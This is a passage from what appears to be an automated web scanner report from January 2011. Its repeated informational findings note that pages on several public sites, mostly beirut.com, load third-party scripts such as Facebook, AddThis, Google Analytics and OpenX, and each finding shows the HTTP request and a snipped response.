  • http://connect.facebook.net/en_US/all.js
  • http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:24:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cea4ae8095ae3ba"></script>
...[SNIP]...
<!-- elem id="499" --><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

21.557. http://www.barelyfitz.com/projects/tabber/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barelyfitz.com
Path:   /projects/tabber/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /projects/tabber/ HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
</table>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.558. http://www.barkerstores.com/soundings/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barkerstores.com
Path:   /soundings/

Issue detail

The response dynamically includes the following script from another domain:
  • http://smarticon.geotrust.com/si.js

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<td height="28" align="middle" width="147">
                       <script language="JavaScript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...

21.559. http://www.beirut.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET / HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:49:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=ael7hgofe5550n3tan4s3cqg47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.560. http://www.beirut.com/Beauty/Cellulite-Reduction/789814461

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Cellulite-Reduction/789814461

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Cellulite-Reduction/789814461 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.561. http://www.beirut.com/Beauty/Facial-Treatment/70794784

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Facial-Treatment/70794784

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Facial-Treatment/70794784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.562. http://www.beirut.com/Beauty/Hair-Removal-Clinics/108766177

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Hair-Removal-Clinics/108766177

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Hair-Removal-Clinics/108766177 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.563. http://www.beirut.com/Beauty/Hair-Salons/220615163

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Hair-Salons/220615163

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Hair-Salons/220615163 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:53:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.564. http://www.beirut.com/Beauty/Makeup-Salons/6608017665

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Makeup-Salons/6608017665

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Makeup-Salons/6608017665 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:54:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.565. http://www.beirut.com/Beauty/Massage-Parlors/9361709237

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Massage-Parlors/9361709237

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Massage-Parlors/9361709237 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:56:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.566. http://www.beirut.com/Beauty/Nail-Salons/7238617

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Beauty/Nail-Salons/7238617

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Nail-Salons/7238617 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:01:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.567. http://www.beirut.com/Financial/Banks/579756203

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Financial/Banks/579756203

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Financial/Banks/579756203 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.568. http://www.beirut.com/Financial/Money-Transfer/348928994

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Financial/Money-Transfer/348928994

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Financial/Money-Transfer/348928994 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:39:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.569. http://www.beirut.com/Galleries/13

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Galleries/13

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Galleries/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:29:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.570. http://www.beirut.com/Hotels/2-Stars/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/2-Stars/2

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/2-Stars/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
